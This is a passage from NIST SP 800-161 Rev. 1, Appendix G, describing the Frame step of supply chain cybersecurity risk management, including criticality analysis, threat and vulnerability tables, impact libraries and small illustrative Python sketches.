order in which each analysis is executed and the interactions required to ensure that the analysis
is inclusive of the various inputs at the enterprise, mission and business process, and operational
levels.
The remainder of this section provides a detailed description of C-SCRM activities within the
Frame, Assess, Respond, and Monitor steps of the Risk Management Process. The structure of
subsections Frame through Monitor mirrors the structure of [NIST SP 800-39], Sections 3.1-3.4.
For each step of the Risk Management Process (i.e., Frame, Assess, Respond, Monitor), the
structure includes Inputs and Preconditions, Activities, and Outputs and Post-Conditions.
Activities are further organized into Tasks according to [NIST SP 800-39]. [NIST SP 800-161,
Rev 1.] cites the steps and tasks of the risk management process, but rather than repeating any
other content of [NIST SP 800-39], it provides C-SCRM-specific guidance for each step with its
Inputs and Preconditions, Activities with corresponding Tasks, and Outputs and Post-Conditions.
This document adds one task to those provided in [NIST SP 800-39] under the Assess step: Task
2-0, Criticality Analysis.
Figure G-2 content (rendered as text):

Frame
• Enterprise: Define C-SCRM assumptions, constraints, risk appetite/tolerance, and priorities/tradeoffs; define the C-SCRM governance and operating model; develop the C-SCRM strategy, policies, and high-level implementation plan; integrate C-SCRM into enterprise risk management
• Mission/Business Process: Define and/or tailor enterprise C-SCRM assumptions, constraints, risk tolerance, and priorities/tradeoffs to the mission/business; develop mission/business-specific C-SCRM strategies, policies, and implementation plans; integrate C-SCRM into mission/business processes
• Operational: Apply/tailor C-SCRM framing from Levels 1 and 2 to individual systems in accordance with the RMF outlined in NIST SP 800-37, Revision 2; integrate C-SCRM throughout the SDLC

Assess
• Enterprise: Refine/enhance the enterprise’s C-SCRM frame; assess enterprise cybersecurity risks in the supply chain based on Frame assumptions and analyses completed at Level 2; determine the supply chain cybersecurity risk exposure of the enterprise’s operations, assets, and individuals
• Mission/Business Process: Refine/enhance criticality assumptions about the mission/business-specific operations, assets, and individuals; assess mission/business-specific threats, vulnerabilities, likelihoods, and impacts; determine the supply chain cybersecurity risk exposure of mission/business-specific operations, assets, and individuals
• Operational: Assess operational cybersecurity risks in the supply chain arising from components or services provided through the supply chain in accordance with the RMF outlined in NIST SP 800-37, Revision 2

Respond
• Enterprise: Make enterprise decisions to accept, avoid, mitigate, share, and/or transfer risk; select, tailor, and implement C-SCRM controls, including common control baselines; document C-SCRM controls in POA&Ms
• Mission/Business Process: Make mission/business-level decisions to accept, avoid, mitigate, share, or transfer risk; select, tailor, and implement appropriate mission/business-level controls, including common control baselines; document C-SCRM controls in POA&Ms
• Operational: Adopt operational-specific C-SCRM controls in accordance with the Select, Implement, Assess, and Authorize steps of NIST SP 800-37, Revision 2

Monitor
• Enterprise: Integrate C-SCRM into the enterprise’s continuous monitoring program; monitor and evaluate enterprise-level assumptions, constraints, risk appetite/tolerance, priorities/tradeoffs, and identified risks; monitor the effectiveness of the enterprise-level risk response
• Mission/Business Process: Integrate C-SCRM into continuous monitoring processes and systems; monitor and evaluate mission-level assumptions, constraints, risk appetite/tolerance, priorities/tradeoffs, and identified risks; monitor the effectiveness of the mission-level risk response
• Operational: Monitor the system and operational-level C-SCRM controls in accordance with the Monitor step of the RMF outlined in NIST SP 800-37, Revision 2
TARGET AUDIENCE
The target audience for this appendix is those individuals with specific C-SCRM responsibilities
for performing the supply chain risk management process across and at each level. Examples
include those process/functional staff responsible for defining the frameworks and
methodologies used by the rest of the enterprise (e.g., C-SCRM PMO Processes, Enterprise Risk
Management, Mission and Business Process Risk Managers, etc.). Other personnel or entities are
free to make use of the guidance as appropriate to their situation.
ENTERPRISE-WIDE RISK MANAGEMENT AND THE RMF
Managing cybersecurity risks throughout the supply chain requires a concerted and purposeful
effort by enterprises across enterprise, mission and business process, and operational levels. This
document describes two different but complementary risk management approaches that are
iteratively combined to facilitate effective risk management across the three levels.
The first approach is known as FARM and consists of four steps: Frame, Assess, Respond, and
Monitor. FARM is primarily used at Level 1 and Level 2 to establish the enterprise’s risk context
and inherent exposure to risk. Then, the risk context from Level 1 and Level 2 iteratively informs
the activities performed as part of the second approach described in [NIST SP 800-37, Rev. 2],
The Risk Management Framework (RMF). The RMF predominantly operates at Level 3 [56] – the
operational level – and consists of seven process steps: Prepare, Categorize, Select, Implement,
Assess, Authorize, and Monitor. Within the RMF, inputs from FARM at Level 1 and Level 2 are
synthesized as part of the RMF Prepare step and then iteratively applied, tailored, and updated
through each successive step of the RMF. Ultimately, Level 1 and Level 2 assumptions are
iteratively customized and tailored to fit the specific operational level or procurement action
context. For example, an enterprise may decide on strategic priorities and threats at Level 1
(enterprise level), which inform the criticality determination of mission and business processes at
Level 2, which in turn influence the system categorization, control selection, and control
implementation as part of the RMF at Level 3 (operational level). Information flow between the
levels is bidirectional with aggregated Level 3 RMF outputs serving to update and refine
assumptions made at Level 1 and Level 2 on a periodic basis.
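A minimal sketch of this bidirectional flow follows, with all names assumed for illustration: Level 1 and Level 2 context is synthesized during the RMF Prepare step, with later levels tailoring broader assumptions, and aggregated Level 3 outputs feed back upstream.

```python
# Illustrative only: context flows down into RMF Prepare; operational
# outputs flow back up to refine enterprise-level assumptions.

def rmf_prepare(level1_frame: dict, level2_frame: dict,
                system_context: dict) -> dict:
    """Later levels tailor (override) broader assumptions where applicable."""
    return {**level1_frame, **level2_frame, **system_context}

def refine_upstream(level1_frame: dict, level3_outputs: dict) -> None:
    """Aggregated operational results update enterprise assumptions."""
    level1_frame.setdefault("observed_risks", []).extend(
        level3_outputs.get("residual_risks", []))

l1 = {"strategic_priorities": ["mission continuity"], "risk_appetite": "low"}
l2 = {"process_criticality": "high"}
ctx = rmf_prepare(l1, l2, {"system": "payments", "categorization": "moderate"})
refine_upstream(l1, {"residual_risks": ["single-source component X"]})
print(ctx["risk_appetite"], l1["observed_risks"])
```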
Frame
Inputs and Preconditions
Frame is the step that establishes the context for C-SCRM at all three levels. The scope and
structure of the enterprise supply chain, the overall risk management strategy, specific enterprise
and mission and business process strategies and plans, and individual information systems are
defined in this step. The data and information collected during Frame provide inputs for scoping
and fine-tuning C-SCRM activities in other risk management process steps throughout the three
levels. Frame is also where guidance in the form of frameworks and methodologies is established
as part of the enterprise and mission and business process level risk management strategies.
[56] The RMF does have some applications at Level 1 and Level 2, such as the identification of common controls.
These frameworks and methodologies provide bounds, standardization, and orientation for
supply chain risk management activities performed within later steps.
[NIST SP 800-39] defines risk framing as “the set of assumptions, constraints, risk tolerances,
and priorities/trade-offs that shape an enterprise’s approach for managing risk.” Enterprise-wide
and C-SCRM risk-framing activities should iteratively inform one another. Assumptions that the
enterprise makes about risk should flow down and inform risk framing within C-SCRM activities
(e.g., enterprise’s strategic priorities). As the enterprise’s assumptions about cybersecurity risks
throughout the supply chain evolve through the execution of C-SCRM activities, these
assumptions should flow up and inform how risk is framed at the enterprise level (e.g., level of
risk exposure to individual suppliers). Inputs into the C-SCRM risk framing process include but
are not limited to:
• Enterprise policies, strategies, and governance
• Applicable laws and regulations
• Agency critical suppliers and contractual services
• Enterprise processes (security, quality, etc.)
• Enterprise threats, vulnerabilities, risks, and risk tolerance
• Enterprise architecture
• Mission-level goals and objectives
• Criticality of missions/processes
• Mission-level security policies
• Functional requirements
• Criticality of supplied system/product components
• Security requirements
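The four framing components lend themselves to a simple structured representation. The sketch below is illustrative; the RiskFrame class and its fields are assumptions. It shows an enterprise-level frame being tailored into a mission/business-level frame, consistent with the flow-down described above.

```python
# Minimal sketch (assumed structure) of a C-SCRM risk frame holding the
# four framing components from [NIST SP 800-39].
from dataclasses import dataclass, field, replace

@dataclass
class RiskFrame:
    assumptions: dict = field(default_factory=dict)   # criticality, threats, ...
    constraints: list = field(default_factory=list)   # resource limits, supply sources
    risk_tolerance: str = "undefined"
    priorities: list = field(default_factory=list)    # priorities and trade-offs

    def tailor(self, **overrides) -> "RiskFrame":
        """Level 2/3 frames refine the broader frame rather than replace it."""
        return replace(self, **overrides)

enterprise = RiskFrame(
    assumptions={"critical_missions": ["benefits delivery"]},
    constraints=["limited vetting budget"],
    risk_tolerance="low",
    priorities=["supplier diversity over unit cost"])
mission = enterprise.tailor(
    priorities=["continuity of the benefits-delivery process"])
print(mission.risk_tolerance)  # inherited from the enterprise frame: low
```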
C-SCRM risk framing is an iterative process that also uses inputs from the other steps of the risk
management processes (Assess, Respond, and Monitor) as inputs. Figure G-3 depicts the Frame
step with its inputs and outputs along the three enterprise levels. At the enterprise level, activities
will focus on framing conditions (i.e., assumptions, constraints, appetites and tolerances, and
priorities and trade-offs) that are broadly applicable across the enterprise. The goal of framing is
to contextualize cybersecurity risks throughout the supply chain in relation to the enterprise and
its strategic goals and objectives. At Level 2, frame activities focus on tailoring the risk frame to
individual mission and business processes (e.g., assumptions about service provider’s role in
achieving mission or business objectives).
Finally, at Level 3, conditions outlined at Level 1 and Level 2 iteratively inform each step of the
RMF process. Beginning with the Prepare step, conditions outlined at Level 1 and Level 2 are
used to establish the context and priorities for managing cybersecurity risks throughout the
supply chain with respect to individual information systems, supplied system components, and
system service providers. With each subsequent RMF step (Categorize through Monitor), these
assumptions are iteratively updated and tailored to reflect applicable operational-level
considerations. Information flow must be bidirectional between levels as insights discovered
while performing lower-level activities may update what is known about conditions outlined in
higher levels.
Fig. G-3: C-SCRM in the Frame Step
Figures G-3 through G-6 depict inputs, activities, and outputs of the Frame step distributed along
the three risk management framework levels. The large arrows on the left and right sides of the
activities depict the inputs and outputs to and from other steps of the Risk Management Process.
Inputs into the Frame step include inputs from other steps and from the enterprise risk
management process that are shaping the C-SCRM process. Up-down arrows between the levels
depict the flow of information and guidance from the upper levels to the lower levels and the
flow of information and feedback from the lower levels to the upper levels. Together, the arrows
indicate that the inputs, activities, and outputs are continuously interacting and influencing one
another.
Figure G-3 content (rendered as text):

Enterprise
• Inputs: Governance structures and processes; enterprise policies and strategies; applicable laws and regulations; enterprise strategic goals and objectives; contractual relationships; financial limitations; enterprise risk frame
• Frame: Determine enterprise C-SCRM assumptions (e.g., criticality, threats, vulnerabilities, impacts, likelihoods), constraints (e.g., resource limitations, supply sources), risk appetite and tolerance, and priorities and tradeoffs; integrate C-SCRM into enterprise risk management
• Outputs: C-SCRM requirements; C-SCRM strategy; C-SCRM policies and procedures (e.g., guidance for scoping, assessment methodology, risk response, and risk monitoring); C-SCRM high-level implementation plan

Mission/Business Process
• Inputs: Output of Level 1 risk framing; criticality of mission/business to enterprise strategic goals and objectives; mission/business-specific governance structures and processes, policies and strategies, laws and regulations, strategic goals and objectives, contractual relationships, and financial limitations
• Frame: Tailor/refine Level 1 assumptions, constraints, risk appetite/tolerance, and priorities and tradeoffs to the specific mission/business; integrate C-SCRM into mission/business processes
• Outputs: Mission/business-specific C-SCRM strategy and C-SCRM policies and procedures; C-SCRM implementation plan

Operational
• Inputs: Output of Level 1 and 2 risk framing; criticality of systems or operations to supported mission/business processes
• Frame: Tailor/refine Level 1 and 2 assumptions, constraints, risk tolerance/appetite, and priorities/tradeoffs to the system or operations; integrate C-SCRM into the SDLC
• Outputs: Operational C-SCRM requirements
As the Frame step is used to define conditions, enterprises may find that Frame activities are
performed relatively less often than the latter steps of the FARM process. Enterprises may re-
perform Frame activities at defined intervals (e.g., annually, bi-annually) or based on defined
triggers (e.g., business changes and/or new or updated insights from other levels).
Activities
RISK ASSUMPTIONS
TASK 1-1: Identify assumptions that affect how risk is assessed, responded to, and monitored
within the enterprise.
Supplemental Guidance
As a part of identifying risk assumptions within the broader Risk Management process
(described in [NIST SP 800-39]), agencies should do the following:
• Develop an enterprise-wide C-SCRM policy.
• Identify which mission and business processes and related components are critical to the
enterprise to determine the criticality.
• Define which mission and business processes and information systems compose the
supply chain, including relevant contracted services and commercial products.
• Prioritize the application of risk treatment for these critical elements, considering factors
such as but not limited to national and homeland security concerns, FIPS 199 impact
levels, scope of use, or interconnections/interdependencies to other critical processes and
assets.
• Identify, characterize, and provide representative examples of threat sources,
vulnerabilities, consequences/impacts, and likelihood determinations related to the supply
chain.
• Define C-SCRM mission, business, and operational-level requirements.
• Select appropriate assessment methodologies, depending on enterprise governance,
culture, and diversity of the mission and business processes.
• Establish a method for the results of C-SCRM activities to be integrated into the overall
agency Risk Management Process.
• Periodically review the supply chain to ensure that definitions remain current as
evolutions occur over time.
These C-SCRM assumptions should be aligned as applicable to the broader risk assumptions
defined as part of the enterprise risk management program. A key C-SCRM responsibility (e.g.,
of the C-SCRM PMO) is identifying which of those assumptions apply to the C-SCRM context
at each successive risk management framework level. If and when new risk assumptions (i.e.,
Task 1-1) are identified, these should be provided as updates to any corresponding Enterprise
Risk Assumptions (i.e., Enterprise Risk Management version of Task 1-1) as part of an iterative
process.
Criticality
Critical processes are those that – if disrupted, corrupted, or disabled – are likely to result in
mission degradation or failure. Mission-critical processes are dependent on their supporting
systems that, in turn, depend on critical components in those systems (e.g., hardware, software,
and firmware). Mission-critical processes also depend on information and processes (performed
by technology or people, to include support service contractors in some instances) that are used
to execute the critical processes. Those components and processes that underpin and enable
mission-critical processes or deliver defensive – and commonly shared – processes (e.g., access
control, identity management, and crypto) and unmediated access (e.g., power supply) should
also be considered critical. A criticality analysis is the primary method by which mission-critical
processes, associated systems/components, and enabling infrastructure and support services are
identified and prioritized. The criticality analysis also involves analyzing critical suppliers that
may not be captured by internal criticality analysis (e.g., supply chain interdependencies
including fourth- and fifth-party suppliers).
Enterprises will make criticality determinations as part of enterprise risk management activities
based on the process outlined in [NISTIR 8179] [57]. Where possible, C-SCRM should inherit
those assumptions and tailor/refine them to include the C-SCRM context. In C-SCRM, criticality
tailoring includes the initial criticality analysis of particular projects, products, and processes in
the supply chain in relation to critical processes at each Level. For example, at Level 1, the
enterprise may determine the criticality of holistic supplier relationships to the enterprise’s
overall strategic objectives. Then, at Level 2, the enterprise may assess the criticality of
individual suppliers, products, and services to specific mission and business processes and
strategic/operational objectives. Finally, at Level 3, the enterprise may assess the criticality of the
supplied product or service to specific operational state objectives of the information systems.
Enterprises may begin by identifying key supplier-provided products or services that contribute
to the operation and resiliency of enterprise processes and systems. Some of these elements may
be captured or defined as part of disaster recovery or continuity of operations plans. The criticality
determination may be based on the role of each supplier, product, or service in achieving the
required strategic or operational objective of the process or system. Requirements, architecture,
and design inform the analysis and help identify the minimum set of supplier-provided products
and/or services required for operations (i.e., at enterprise, mission and business process, and
operational levels). The analysis combines top-down and bottom-up analysis approaches. The
top-down approach in this model enables the enterprise to identify critical processes and then
progressively narrow the analysis to critical systems that support those processes and critical
components that support the critical functions of those systems. The bottom-up approach
progressively traces the impact that a malfunctioning, compromised, or unavailable critical
component would have on the system and, in turn, on the related mission and business process.
Enterprises that perform this analysis should include agency system and cybersecurity supply
chain dependencies, to include critical fourth-party suppliers. For example, an enterprise may
[57] See NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components.
find exposures to cybersecurity risks that result from third-party suppliers receiving critical input
or services from a common fourth-party supplier.
Determining criticality is an iterative process performed at all levels during both Frame and
Assess. In Frame, criticality determination is expected to be performed at a high level using the
available information with further detail incorporated through additional iterations or at the
Assess step. Determining criticality may include the following:
• Define criticality analysis procedures to ensure that there is a set of documented
procedures to guide the enterprise’s criticality analysis across levels.
• Conduct enterprise and mission-level criticality analysis to identify and prioritize
enterprise and mission objectives, goals, and requirements.
• Conduct operational-level criticality analysis (i.e., systems and sub-systems) to identify
and prioritize critical workflow paths, system functionalities, and capabilities.
• Conduct system and subsystem component-level criticality analysis to identify and
prioritize key system and subsystem inputs (e.g., COTS products).
• Conduct a detailed review (e.g., bottom-up analysis) of impacts and interactions between
enterprise, mission, system/sub-systems, and components/sub-components to ensure
cross-process interaction and collaboration.
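The combined approach can be sketched as traversals over a dependency graph. This is a toy illustration in which the graph and all names are assumptions: top-down walks from a critical process to the systems and components it transitively depends on, while bottom-up traces the processes impacted by a failed component.

```python
# Illustrative dependency graph: process -> systems -> components.
DEPENDS_ON = {
    "claims processing": ["claims system"],
    "claims system": ["auth service", "COTS database"],
}

def top_down(process: str) -> set[str]:
    """Everything a critical process transitively depends on is critical."""
    critical, stack = set(), [process]
    while stack:
        node = stack.pop()
        for dep in DEPENDS_ON.get(node, []):
            if dep not in critical:
                critical.add(dep)
                stack.append(dep)
    return critical

def bottom_up(component: str) -> set[str]:
    """Which systems and processes are impacted if this component fails?"""
    impacted = {node for node, deps in DEPENDS_ON.items() if component in deps}
    for parent in list(impacted):
        impacted |= bottom_up(parent)
    return impacted

print(top_down("claims processing"))  # {'claims system', 'auth service', 'COTS database'}
print(bottom_up("COTS database"))     # {'claims system', 'claims processing'}
```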
Given the potential impact that a supply chain incident may have on an organization’s
operations, assets, and – in some instances – business partners or customers, it is important for
organizations to ensure that in addition to criticality, materiality considerations are built into their
supply chain risk management strategy, risk assessment practices, and overall governance of
supply chain risks. In contrast to criticality, materiality considers whether the information would
have been viewed by a reasonable investor making an investment decision as significantly
altering the total mix of information available to the shareholder [58]. SEC guidance states:
…the materiality of cybersecurity risks and incidents also depends on the range of
harm that such incidents could cause. This includes harm to a company’s
reputation, financial performance, and customer and vendor relationships, as well
as the possibility of litigation or regulatory investigations or actions, including
regulatory actions by state and federal governmental authorities and non-U.S.
authorities.
Criticality can be determined for existing systems or for future system investments, development,
or integration efforts based on system architecture and design. It is an iterative activity that
should be performed when a change warranting iteration is identified in the Monitor step.
Threat Sources
For C-SCRM, threat sources include 1) adversarial threats, such as cyber/physical attacks to the
supply chain or to an information system component(s) traversing the supply chain; 2) accidental
human errors; 3) structural failures, including the failure of equipment, environmental controls,
and resource depletion; and 4) environmental threats, such as geopolitical disruptions,
pandemics, economic upheavals, and natural or human-made disasters. With regard to
adversarial threats, [NIST SP 800-39] states that enterprises should provide a succinct
characterization of the types of tactics, techniques, and procedures employed by adversaries that
are to be addressed by safeguards and countermeasures (i.e., security controls) deployed at Level
1 (enterprise level), at Level 2 (mission and business process level), and at Level 3 (information
system/services level), making explicit the types of threat sources to be addressed and the threat
sources that are not addressed by the safeguards and countermeasures.
58 Refer to the glossary for definition details.
Threat information can include but is not limited to historical threat data, factual threat data, or
business entity-specific (e.g., suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers) or technology-specific threat data. Threat
information may come from multiple information sources, including the U.S. Intelligence
Community (for federal agencies), DHS, CISA, the FBI, Information Sharing and Analysis
Centers (ISAC), and open source reporting, such as news and trade publications, partners,
suppliers, and customers. When applicable, enterprises may rely on the Federal Acquisition
Security Council’s (FASC) Information Sharing Agency (ISA) for supply chain threat
information in addition to the aforementioned sources. As threat information may include
classified intelligence, it is crucial that departments and agencies have the capabilities required to
process classified intelligence. Threat information obtained as part of the Frame step should be
used to document the enterprise’s long-term assumptions about threat conditions based on its
unique internal and external characteristics. During the Assess step, updated threat information is
infused into the risk assessment to account for short-term variations in threat conditions (e.g.,
due to geopolitical circumstances) that would impact decisions made concerning the
procurement of a product or service.
Information about the supply chain (such as supply chain maps) provides the context for
identifying possible locations or access points for threat sources and agents to affect the supply
chain. Supply chain cybersecurity threats are similar to information security threats, such as
disasters, attackers, or industrial spies. Table G-1 lists examples of supply chain cybersecurity
threat agents. Appendix G provides Risk Response Plans with examples of the Supply Chain
Threat Sources and Agents listed in Table G-1.
Table G-1: Examples of Supply Chain Cybersecurity Threat Sources and Agents

Adversarial: Counterfeiters
Threat: Counterfeits inserted into the supply chain (see Appendix B, Scenario 1)
Example: Criminal groups seek to acquire and sell counterfeit cyber components for monetary
gain. Specifically, organized crime groups seek disposed units, purchase overstock items, and
acquire blueprints to obtain cyber components intended for sale through various gray market
resellers to acquirers.59

Adversarial: Malicious Insiders
Threat: Intellectual property loss
Example: Disgruntled insiders sell or transfer intellectual property to competitors or foreign
intelligence agencies for a variety of reasons, including monetary gain. Intellectual property
includes software code, blueprints, or documentation.

Adversarial: Foreign Intelligence Services
Threat: Malicious code insertion (see Appendix B, Scenario 4)
Example: Foreign intelligence services seek to penetrate the supply chain and implant unwanted
functionality (by inserting new or modifying existing functionality) into a system to gather
information or subvert60 the system or mission operations when the system is operational.

Adversarial: Terrorists
Threat: Unauthorized access
Example: Terrorists seek to penetrate or disrupt the supply chain and may implant unwanted
functionality to obtain information or cause physical disablement and destruction of systems
through the supply chain.

Adversarial: Industrial Espionage/Cyber Criminals
Threat: Industrial espionage or intellectual property loss (see Appendix B, Scenario 2)
Example: Industrial spies or cyber criminals seek ways to penetrate the supply chain to gather
information or subvert system or mission operations (e.g., exploitation of an HVAC contractor
to steal credit card information).

Adversarial: Organized Cyber Criminals
Threat: Ransomware leads to the disruption of a critical production process
Example: Cyber-criminal organizations target enterprises with ransomware attacks in the hope
of securing ransom payments for monetary gain. Threat sources recognize that enterprises,
especially manufacturers, have significant exposure to production disruptions.

Systemic: Legal/Regulatory
Threat: Legal or regulatory complications impact the availability of key supplier-provided
products and/or services
Example: Weak anti-corruption laws, a lack of regulatory oversight, or weak intellectual
property considerations, including threats that result from country-specific laws, policies, and
practices intended to undermine competition and free market protections (e.g., the requirement
to transfer technology and intellectual property to domestic providers in a foreign country).61

Systemic: Economic Risks
Threat: Business failure of a key supplier leads to supply chain disruption
Example: Economic risks stem from threats to the financial viability of suppliers and the
potential impact to the supply chain resulting from the failure of a key supplier. Other threats to
the supply chain that result in economic risks include vulnerabilities to cost volatility, reliance
on single-source suppliers, the cost to swap out suspect vendors, and resource constraints due to
company size.62

Systemic: Supply Disruptions
Threat: Production shortfalls in rare earth metals lead to supply shortages for critical production
inputs into semiconductors
Example: A variety of systemic and structural failures can cause supply shortages for products
and product components, especially in cases where the source of supply is in a single
geographic location.

Environmental: Disasters
Threat: Geopolitical or natural disaster leads to supply chain disruption
Example: The availability of key supply chain inputs is subject to disruptions from geopolitical
upheavals or natural disasters. This is especially the case when suppliers share a common
fourth-party supplier.

Structural: Hardware Failure
Threat: Inadequate capacity planning leads to an outage in a cloud platform
Example: A vendor or supplier service without the appropriate capacity controls in place could
be subject to disruptions in the event of unexpected surges in resource demand.

Accidental: Negligent Insiders
Threat: Configuration error leads to data exposure
Example: Employees and contractors with access to information systems are prone to errors
that could result in the disclosure of sensitive data. This is especially true in cases where
training lapses or process gaps increase the opportunities for errors.

59 See [Defense Industrial Base Assessment: Counterfeit Electronics].
60 Examples of subverting operations include gaining unauthorized control of the cybersecurity supply chain or flooding it with
unauthorized service requests to reduce or deny legitimate access.
61 Information and Communications Technology Supply Chain Risk Management Task Force: Threat Evaluation Working Group (v3), August
2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015
version of NIST SP 800-161.
62 Information and Communications Technology Supply Chain Risk Management Task Force: Threat Evaluation Working Group (v3), August
2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015
version of NIST SP 800-161.
Agencies can identify and refine C-SCRM-specific threats in all three levels. Table G-2 provides
examples of threat considerations and different methods for characterizing supply chain
cybersecurity threats at different levels.
Table G-2: Supply Chain Cybersecurity Threat Considerations

Level 1
Threat Considerations:
• Enterprise business and mission
• Strategic supplier relationships
• Geographical considerations related to the extent of the enterprise's supply chain
Methods:
• Establish common starting points for identifying supply chain cybersecurity threats.
• Establish procedures for countering enterprise-wide threats, such as the insertion of
counterfeits into critical systems and components.

Level 2
Threat Considerations:
• Mission and business processes
• Geographic locations
• Types of suppliers (e.g., COTS, external service providers, or custom)
• Technologies used enterprise-wide
Methods:
• Identify additional sources of threat information specific to enterprise mission and business
processes.
• Identify potential threat sources based on the locations and suppliers identified through
examining available agency cybersecurity supply chain information (e.g., from a supply chain
map).
• Scope identified threat sources to the specific mission and business processes using the
agency's cybersecurity supply chain information.
• Establish mission-specific preparatory procedures for countering threat adversaries and
natural disasters.

Level 3
Threat Considerations:
• SDLC
Methods:
• Base the level of detail with which threats should be considered on the SDLC phase.
• Identify and refine threat sources based on the potential for threat insertion within individual
SDLC processes.
Vulnerabilities
A vulnerability is a weakness in an information system, system security procedures, internal
controls, or implementation that could be exploited or triggered by a threat source [NIST SP 800-
53, Rev. 5]. Within the C-SCRM context, it is any weakness in the supply chain, provided
services, system/component design, development, manufacturing, production, shipping and
receiving, delivery, operation, and component end-of-life that can be exploited by a threat
source. This definition applies to the services, systems, and components being developed and
integrated (i.e., within the SDLC) as well as to the supply chain, including any security
mitigations and techniques, such as identity management or access control systems.
Vulnerability assumptions made in the Frame step of the FARM process capture the enterprise’s
long-term assumptions about their weaknesses that can be exploited or triggered by a threat
source. These will become further refined and updated to reflect point-in-time variances during
the Assess step. Enterprises may make long-term supply chain cybersecurity vulnerability
assumptions about:
• The entities within the supply chain itself (e.g., individual supplier relationships);
• The critical services provided through the supply chain that support the enterprise’s
critical mission and business processes;
• The products, systems, and components provided through the supply chain and used
within the SDLC (i.e., being developed and integrated);
• The development and operational environment that directly impacts the SDLC; and
• The logistics and delivery environment that transports systems and components (logically
or physically).
Vulnerabilities manifest differently across the three levels (i.e., enterprise, mission and business
process, information system). At Level 1, vulnerabilities present as susceptibilities of the
enterprise at large due to managerial and operating structures (e.g., policies, governance,
processes), conditions in the supply chain (e.g., concentration of products or services from a
single supplier), and characteristics of enterprise processes (e.g., use of a common system across
critical processes). At Level 2, vulnerabilities are specific to a mission and business process and
result from its operating structures and conditions, such as reliance on a specific system,
supplier-provided input, or service to achieve specific mission and business process operating
objectives. Level 2 vulnerabilities may vary widely across the different mission and business
processes. Within Level 3, vulnerabilities manifest as deficiencies or weaknesses in a supplied
product, the SDLC, system security procedures, internal controls, system implementations,
system inputs, or services provided through the supply chain (e.g., system components or
services).
Enterprises should identify approaches to characterizing supply chain cybersecurity
vulnerabilities that are consistent with the characterization of threat sources and events and with
the overall approach employed by the enterprise for characterizing vulnerabilities.
Vulnerabilities may be relevant to a single threat source or broadly applicable across threat
sources (adversarial, structural, environmental, accidental). For example, a single point of failure
in a network may be subject to disruptions caused by environmental threats (e.g., disasters) or
adversarial threats (terrorists). Appendix B provides examples of supply chain cybersecurity
threats, based on [NIST SP 800-30, Rev. 1, Appendix B].
All three levels should contribute to determining the enterprise’s approach to characterizing
vulnerabilities with progressively more detail identified and documented in the lower levels.
Table G-3 provides examples of considerations and different methods for characterizing supply
chain cybersecurity vulnerabilities at different levels.
Table G-3: Supply Chain Cybersecurity Vulnerability Considerations

Level 1
Vulnerability Considerations:
• Enterprise mission and business
• Holistic supplier relationships (e.g., system integrators, COTS, external services)
• Geographical considerations related to the extent of the enterprise's supply chain
• Enterprise and security architecture
• Criticality
Methods:
• Examine agency cybersecurity supply chain information, including supply chain maps, to
identify especially vulnerable entities, locations, or enterprises.
• Analyze the agency mission for susceptibility to potential supply chain cybersecurity
vulnerabilities.
• Examine third-party provider and supplier relationships and interdependencies for
susceptibility to potential supply chain cybersecurity vulnerabilities.
• Review enterprise architecture and criticality to identify areas of weakness that require more
robust cybersecurity supply chain considerations.

Level 2
Vulnerability Considerations:
• Mission and business processes
• Geographic locations
• Mission- and process-level supplier dependencies (e.g., outsourced or contracted services)
• Technologies used
Methods:
• Refine the analysis from Level 1 based on specific mission and business processes and
applicable threat and supply chain information.
• If appropriate, use the National Vulnerability Database (NVD) – including Common
Vulnerabilities and Exposures (CVE) and the Common Vulnerability Scoring System (CVSS) –
to characterize, categorize, and score vulnerabilities63 or use other acceptable methodologies
(see the sketch following this table).
• Consider using scoring guidance to prioritize vulnerabilities for remediation.

Level 3
Vulnerability Considerations:
• Individual technologies, solutions, and services
• Supply chain SDLC inputs, such as system components or services
Methods:
• Refine the analysis based on inputs from related Level 2 missions and business processes.
• Use CVEs where available to characterize and categorize vulnerabilities.
• Identify weaknesses.

63 See https://nvd.nist.gov/.
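To illustrate the CVSS-based prioritization method referenced in the Level 2 row above, a
minimal sketch follows. The CVE identifiers, scores, and weighting scheme are hypothetical; a
real implementation would draw CVSS data from NVD records:

```python
# Illustrative sketch: prioritize vulnerabilities for remediation by weighting
# a CVSS base score with the criticality of the affected component.
# The CVE identifiers and all values below are hypothetical placeholders.

findings = [
    {"cve": "CVE-0000-0001", "cvss": 9.8, "component_criticality": 3},
    {"cve": "CVE-0000-0002", "cvss": 6.5, "component_criticality": 3},
    {"cve": "CVE-0000-0003", "cvss": 8.1, "component_criticality": 1},
]

def remediation_priority(finding: dict) -> float:
    # Simple weighting: CVSS base score (0-10) scaled by ordinal criticality (1-3).
    return finding["cvss"] * finding["component_criticality"]

for f in sorted(findings, key=remediation_priority, reverse=True):
    print(f["cve"], round(remediation_priority(f), 1))
```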
Impact and Harm
Impact is the effect on enterprise operations, enterprise assets, individuals, other enterprises, or
the Nation (including the national security interests of the United States) of a loss of
confidentiality, integrity, or availability of information or an information system [NIST SP 800-
53, Rev. 5]. Impact estimated within the Frame step represents the enterprise’s long-term
assumptions about the effects that different cybersecurity events may have on its primary
processes. These assumptions are updated and refined as part of the Assess step to ensure that
point-in-time relevant information (e.g., market conditions) that may alter the impact’s scope,
duration, or magnitude is appropriately reflected in the analysis.
When possible, enterprises should inherit assumptions made by the enterprise on consequences
and impact as part of enterprise risk management activities. For example, one of these activities
is performing a business impact analysis (BIA) to determine or revalidate mission-critical and
mission-enabling processes as part of the enterprise’s continuity and emergency preparedness
responsibilities. However, these assumptions may need to be developed if they do not yet exist.
Enterprises may maintain impact or harm libraries that capture the enterprise’s standing
assumptions about the impact or harm of different cybersecurity event types (e.g., disclosure,
disruption, destruction, modification) on the enterprise’s assets. These libraries may break down
impact and harm into individual impact types (e.g., operational, environmental, individual safety,
reputational, regulatory/legal fines and penalties, IT recovery/replacement, direct financial
damage to critical infrastructure sector).
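As a minimal sketch, such a library can be represented as structured data. The event types,
impact types, and dollar ranges below are hypothetical:

```python
# Illustrative sketch of an impact/harm library keyed by cybersecurity event
# type. The impact types and magnitude ranges (in USD) are hypothetical.

HARM_LIBRARY = {
    "disruption": {
        "operational": (500_000, 5_000_000),   # lost production
        "it_recovery": (50_000, 250_000),      # recovery/replacement costs
    },
    "disclosure": {
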